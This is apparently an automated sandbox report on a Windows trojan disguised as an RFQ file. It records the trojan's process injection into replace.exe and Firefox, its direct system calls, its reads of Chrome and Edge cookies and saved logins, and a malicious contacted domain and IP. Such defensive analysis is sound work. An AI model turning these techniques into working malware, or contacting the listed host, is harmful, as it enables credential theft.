            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C83C0 mov eax, dword ptr fs:[00000030h]2_2_013C83C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B823B mov eax, dword ptr fs:[00000030h]2_2_013B823B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01448243 mov eax, dword ptr fs:[00000030h]2_2_01448243
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01448243 mov ecx, dword ptr fs:[00000030h]2_2_01448243
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B256 mov eax, dword ptr fs:[00000030h]2_2_0147B256
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B256 mov eax, dword ptr fs:[00000030h]2_2_0147B256
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148D26B mov eax, dword ptr fs:[00000030h]2_2_0148D26B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148D26B mov eax, dword ptr fs:[00000030h]2_2_0148D26B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01401270 mov eax, dword ptr fs:[00000030h]2_2_01401270
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01401270 mov eax, dword ptr fs:[00000030h]2_2_01401270
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01470274 mov eax, dword ptr fs:[00000030h]2_2_01470274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7208 mov eax, dword ptr fs:[00000030h]2_2_013F7208
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F7208 mov eax, dword ptr fs:[00000030h]2_2_013F7208
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E9274 mov eax, dword ptr fs:[00000030h]2_2_013E9274
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B826B mov eax, dword ptr fs:[00000030h]2_2_013B826B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C4260 mov eax, dword ptr fs:[00000030h]2_2_013C4260
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C6259 mov eax, dword ptr fs:[00000030h]2_2_013C6259
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA250 mov eax, dword ptr fs:[00000030h]2_2_013BA250
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495227 mov eax, dword ptr fs:[00000030h]2_2_01495227
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F724D mov eax, dword ptr fs:[00000030h]2_2_013F724D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9240 mov eax, dword ptr fs:[00000030h]2_2_013B9240
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9240 mov eax, dword ptr fs:[00000030h]2_2_013B9240
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02A0 mov eax, dword ptr fs:[00000030h]2_2_013D02A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D02A0 mov eax, dword ptr fs:[00000030h]2_2_013D02A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D52A0 mov eax, dword ptr fs:[00000030h]2_2_013D52A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F329E mov eax, dword ptr fs:[00000030h]2_2_013F329E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F329E mov eax, dword ptr fs:[00000030h]2_2_013F329E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014712ED mov eax, dword ptr fs:[00000030h]2_2_014712ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Memory written: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Section loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Process created: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: KdcHSkcpIgYD.exe, 00000004.00000000.1853836603.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895817745.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000000.1995433621.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\replace.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\replace.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Entries are listed per tactic in matrix order; a number in parentheses is the figure printed beside that technique in the matrix.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: Security Software Discovery (21); Process Discovery (2); Virtualization/Sandbox Evasion (41); System Information Discovery (13); Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (2); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            Source | Detection | Scanner | Label
            RFQ 0400-ENPI-RQMA.exe | 29% | ReversingLabs | Win32.Trojan.Generic
            RFQ 0400-ENPI-RQMA.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.maxiwalls.com | 79.98.25.1 | true | true | | unknown
                                                                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                    79.98.25.1 | www.maxiwalls.com | Lithuania | 62282 | RACKRAYUABRakrejusLT | true
                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                    Analysis ID:1430324
                                                                                    Start date and time:2024-04-23 14:22:05 +02:00
                                                                                    Joe Sandbox product:CloudBasic
